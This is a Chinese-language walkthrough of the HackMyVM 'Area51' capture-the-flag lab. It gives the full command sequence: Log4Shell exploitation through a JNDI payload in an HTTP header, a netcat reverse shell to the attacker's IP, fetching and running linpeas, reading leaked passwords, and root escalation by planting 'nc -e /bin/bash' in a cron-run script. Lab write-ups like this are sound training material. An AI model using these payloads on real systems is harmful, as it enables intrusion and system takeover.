靶机信息
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51名称:Area51(51区)
难度:中等
创作者:bit
发布日期:2021-12-24
目标:user.txt和root.txt
搭建靶机
下载完Area51.ova后,使用Oracle VM VirtualBox导入即可
注意导入!!不要钩!USB控制器,否则会出错
导入完成后,可以直接启动,开始靶机之旅
实验环境
攻击机:VMware Kali 192.168.2.148 目标机:VirtualBox Debian IP自动获取信息收集
扫描局域网内的靶机IP地址
nmap -sn 192.168.2.0/24扫描端口,扫描目标机器开放的服务
nmap -A -p- 192.168.2.108扫描到22(SSH)、80(HTTP)、8080(HTTP)用火狐浏览器访问80端口三个端口,192.168.2.108
佛波乐,好家伙(FBI)页面,访问8080端口,192.168.2.108:8080
发现400错误页面
扫描目录,扫描一些敏感文件等。gobuster来扫描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt扫描到一个note.txt,访问下192.168.2.108/note.txt
翻译看看
渗透测试
提示存在Log4j直接访问和使用漏洞很可能与8080端口有关Burp的插件log4j扫描看看
发现X-Api-Version:参数中存在漏洞
存在log4j漏洞,使用poc(GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.)拿shell
在kali机器中,log4j-shell-poc必须有目录jdk1.8.0_20文件夹的java
(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)
git clone https://github.com/kozmer/log4j-shell-poc.git cd log4j-shell-poc python3 poc.py --userip 192.168.2.148打开新的终端页面进行监控
nc -nvlp 9001打开一个新的终端页面,输入刚刚payload
curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'这里的终端收到了监控
发现是在docker在里面,上传一个linpeas.sh搜集下信息
kali机器下载好linpeas.sh,打开一个新的终端页面,打开远程下载服务
python3 -m http.server 7788监控此处的终端页面下载linpeas.sh
wget http://192.168.2.148:7788/linpeas.sh执行linpeas.sh信息收集
chmod x linpeas.sh ./linpeas.sh查看一些目录
cat /var/tmp/.roger,查询到roger的密码 使用ssh远程登录 ssh roger@192.168.2.108拿到user.txt下的一个FLAG=[xxxxxx]
继续使用linpeas.sh搜集信息
wget http://192.168.2.148:7788/linpeas.sh chmod x linpeas.sh ./linpeas.sh发现了roger下有个kang
cat /etc/pam.d/kang,发现是kang的密码 su kang发现kang一些奇怪的事情发生在主目录中,一份文件不断出现和消失
看起来像是kang用户创建了一个shell脚本,执行一切.sh并删除它们
echo "echo test >/tmp/test" > test.sh ls /tmp/test -l echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh打开新的终端页面进行监控
nc -nvlp 4444 python3 -c 'import pty;pty.spawn("/bin/bash")' cd root cat root.txt成功获取到root权限下的FLAG=[xxxxx]
声明:请勿用作违法用途,请在授权情况下使用